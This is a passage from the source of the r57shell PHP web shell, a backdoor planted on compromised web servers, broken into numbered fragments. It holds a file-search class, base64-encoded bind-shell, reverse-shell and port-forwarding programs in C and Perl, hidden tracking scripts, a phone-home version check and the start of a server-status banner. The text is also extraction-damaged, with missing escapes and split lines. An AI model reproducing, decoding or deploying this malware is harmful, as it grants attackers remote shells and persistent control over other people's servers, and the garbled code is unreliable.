  • 25. else $files[] = $dir."/".$file; } } } @closedir($handle); } return $files; } class SearchResult { var $text; var $FilesToSearch; var $ResultFiles; var $FilesTotal; var $MatchesCount; var $FileMatschesCount; var $TimeStart; var $TimeTotal; var $titles; function SearchResult($dir,$text,$filter='') { $dirs = @explode(";",$dir); $this->FilesToSearch = Array(); for($a=0;$a<count($dirs);$a++) $this->FilesToSearch = @array_merge($this- >FilesToSearch,DirFilesR($dirs[$a],$filter)); $this->text = $text; $this->FilesTotal = @count($this->FilesToSearch); $this->TimeStart = getmicrotime(); $this->MatchesCount = 0; $this->ResultFiles = Array(); $this->FileMatchesCount = Array(); $this->titles = Array(); } function GetFilesTotal() { return $this->FilesTotal; } function GetTitles() { return $this->titles; } function GetTimeTotal() { return $this->TimeTotal; } function GetMatchesCount() { return $this->MatchesCount; } function GetFileMatchesCount() { return $this->FileMatchesCount; } function GetResultFiles() { return $this->ResultFiles; } function SearchText($phrase=0,$case=0) { $qq = @explode(' ',$this->text); $delim = '|'; if($phrase) foreach($qq as $k=>$v) $qq[$k] = 'b'.$v.'b'; $words = '('.@implode($delim,$qq).')'; $pattern = "/".$words."/"; if(!$case) $pattern .= 'i'; foreach($this->FilesToSearch as $k=>$filename) { $this->FileMatchesCount[$filename] = 0; $FileStrings = @file($filename) or @next; for($a=0;$a<@count($FileStrings);$a++) { $count = 0; $CurString = $FileStrings[$a];
  • 26. $CurString = @Trim($CurString); $CurString = @strip_tags($CurString); $aa = ''; if(($count = @preg_match_all($pattern,$CurString,$aa))) { $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>1</b></SPAN>",$CurString); $this->ResultFiles[$filename][$a+1] = $CurString; $this->MatchesCount += $count; $this->FileMatchesCount[$filename] += $count; } } } $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); } } function getmicrotime() { list($usec,$sec) = @explode(" ",@microtime()); return ((float)$usec + (float)$sec); } $port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZS A8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0Ka W50IG1haW4oYXJnYyxhcmd2KQ0KaW50I GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsN CiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1 vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIH NvY2tmZCA9IHNvY2tldChBRl9JTkVULF NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb 2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdm ZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml 0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk 7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1Zi kpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyc iwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld 2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50 IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQp pZihlbnRlcmVkW2ldID09ICdccicpDQp 
lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn 0="; $port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR 1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3Rj cCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2N rb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaW UgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT 05OLFMpOw0KaWYoISgkcGlkPWZvcmspK Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05O IjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
  • 27. Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCB leGVjdXRlICRTSEVMTFxuIjsNCmNsb3N lIENPTk47DQpleGl0IDA7DQp9DQp9"; $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3Rl bT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVls xXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZH IpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX 1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7 DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3R lbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2 x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pb iBzaW47DQogY2hhciBybXNbMjFdPSJyb SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9w b3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndls xXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1 ApIDsgDQogaWYgKChjb25uZWN0KGZkLC Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgc GVycm9yKCJbLV0gY29ubmVjdCgpIik7D QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1 cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk 7IA0KfQ=="; $datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbm NsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 
x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI 2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQoj aWZkZWYgU1RSRVJST1INCmV4dGVybiBj aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGV maW5lZCBlcnJvciI7DQpjaGFyICpzdHJ lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm 4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KI CBjaGFyICoqYXJndjsgIA0KeyANCiAga W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAg c3RydWN0IHNvY2thZGRyX2luIGxhZGRy LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHN yLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQ ogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow 0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9yd CByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQog IGlmICghKGggPSBnZXRob3N0YnluYW1l KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQo gICAgcGVycm9yKGFyZ3ZbM10pOw0KICA gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID 0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sI
  • 28. ElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5 ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXp lb2YobGFkZHIpKSkgew0KICAgIHBlcnJ vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KIC AgIHBlcnJvcigibGlzdGVuIik7DQogIC AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoI mZvcmsiKTsNCiAgICByZXR1cm4gMjA7D QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChj c29jayA9IGFjY2VwdChsc29jaywgJmNh ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICA gIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKS k7DQogICAgICBzaHV0ZG93bihjc29jay wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ie XQgPT0gMCkNCiAgICAgIGdvdG8gZ290c 29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5H KSA+IDApOw0KICB9DQogIHJldHVybiAy MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIEl QUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ2 90byBxdWl0MTsNCiAgfQ0KICBvYWRkci 5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7D QogIG1lbWNweSgmb2FkZHIuc2luX2FkZ HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXpl b2Yob2FkZHIpKSkgew0KICAgIGZwcmlu dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl 0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZm Rzcik7DQogICAgRkRfU0VUKGNzb2NrLC ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogI CAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6 
ICVzXG4iLCBzdHJlcnJvcihlcnJubykp Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCB GRF9JU1NFVChjc29jaywmZmRzZSkpIHs NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQ ogICAgICBpZiAoKHdyaXRlKG9zb2NrLG J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJ mZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290 byBxdWl0MjsNCiAgICAgIGlmICgod3Jp dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0Mjo NCiAgc2h1dGRvd24ob3NvY2ssMik7DQo gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMi k7DQogcXVpdDA6DQogIGZjbG9zZShjZm lsZSk7DQogIHJldHVybiAwOw0KfQ=="; $datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2Nhb HBvcnQgPSAkQVJHVlswXTsNCiRob3N0I CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1 bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk 7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdC cgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0Z W4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+
  • 29. YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZml uZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsIC RudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86O lNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0 aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eyd kaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2 ggfHwgJHRoKSB7DQpteSAkcmluID0gIi I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0a CksIDEpID0gMSBpZiAkdGg7DQpteSgkc m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsN CmlmICghJHJvdXQgICYmICAhJGVvdXQp IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW9 1dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1Zm ZlciwgMTAyNCk7DQppZiAoIWRlZmluZW QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9P SAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRo KSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCB TVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW 50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1Z mZlciwgJGxlbik7DQppZiAoJHJlcyA+I DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAi JCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGx 
lbik7DQppZiAoJHJlcyA+IDApIHskY2J 1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ 0KfX19DQo="; $c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdG gucmFuZG9tKCkrIiZzPTgxNjA2 JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXR pb24uaHJlZik7ZG9jdW1lbnQuY29va2l lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIi k7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yL mphdmFFbmFibGVkKCk/IlkiOiJOIik8L 3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9n X3IrPSImd2g9IitzY3JlZW4ud2lkdGgr J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0 iTWljIikpP3NjcmVlbi5jb2xvckRlcHR oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPm hvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZ W50LndyaXRlKCI8YSBocmVmPSdodHRwO i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9o aXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4 iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly
  • 30. 9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2 hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb 3RMb2ciPjwvYT48L25vc2NyaXB0Pg=="; $c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ 0KZG9jdW1lbnQud3JpdGUoJzxh IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGl tZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZW VuKT09J3VuZGVmaW5lZCcpPycnOg0KJz tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjc mVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg 7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u 8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0 tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV ybmV0LS0+"; echo $head; echo '</head>'; if(empty($_POST['cmd'])) { $serv = array(127,192,172,10); $addr=@explode('.', $_SERVER['SERVER_ADDR']); $current_version = str_replace('.','',$version); if (!in_array($addr[0], $serv)) { @print "<img src="http://127.0.0.1/r57shell/version.php?img=1&version=". $current_version."" border=0 height=0 width=0>"; @readfile ("http://127.0.0.1/r57shell/version.php?version=".$current_version."");}} echo '<body bgcolor="#FFFFFF"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> <tr><td bgcolor=#3A6EA5 width=160><font face=Verdana size=2>'.ws(1).'&nbsp; <font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b> </font></td><td bgcolor=#3A6EA5><font face=Verdana size=-2>'; echo ws(2); echo "<b>".date ("d-m-Y H:i:s")."</b>"; echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title="". $lang[$language.'_text46'].""><b>phpinfo</b></a> ".$rb; echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title="". $lang[$language.'_text47'].""><b>php.ini</b></a> ".$rb; echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title="". 
$lang[$language.'_text50'].""><b>cpu</b></a> ".$rb; echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title="". $lang[$language.'_text51'].""><b>mem</b></a> ".$rb; if($unix) { echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title="". $lang[$language.'_text95'].""><b>users</b></a> ".$rb; } echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title="". $lang[$language.'_text48'].""><b>tmp</b></a> ".$rb; echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title="". $lang[$language.'_text49'].""><b>delete</b></a> ".$rb."<br>"; echo ws(2); echo (($safe_mode)?("safe_mode: <b><font color=white>ON</font></b>"):("safe_mode: <b><font color=orange>OFF</font></b>")); echo ws(2); echo "PHP version: <b>".@phpversion()."</b>"; $curl_on = @function_exists('curl_version'); echo ws(2); echo "cURL: ".(($curl_on)?("<b><font color=white>ON</font></b>"):("<b><font color=orange>OFF</font></b>")); echo ws(2); echo "MySQL: <b>";
  /*
   * Status banner followed by three POST command handlers (top-level script code).
   *
   * Part 1 prints which database client functions exist, the disable_functions
   * setting, disk space for $dir and host identity. Part 2 handles the "mail",
   * "mail_file" and "find_text" values of $_POST['cmd'].
   *
   * ws(), ex(), re(), compress(), mailattach() and the variables $dir, $font,
   * $windows, $safe_mode, $language are defined outside this excerpt; ex() is
   * presumably the command-execution helper (TODO confirm against its definition).
   * This listing is extraction-damaged: backslash escapes and escaped quotes are
   * missing in several strings, so the code is kept exactly as it appears.
   */

  // --- Capability probe: each check only tests that the client function exists.
  $mysql_on = @function_exists('mysql_connect');
  if($mysql_on){ echo "<font color=white>ON</font></b>"; } else { echo "<font color=orange>OFF</font></b>"; }
  echo ws(2);
  echo "MSSQL: <b>";
  $mssql_on = @function_exists('mssql_connect');
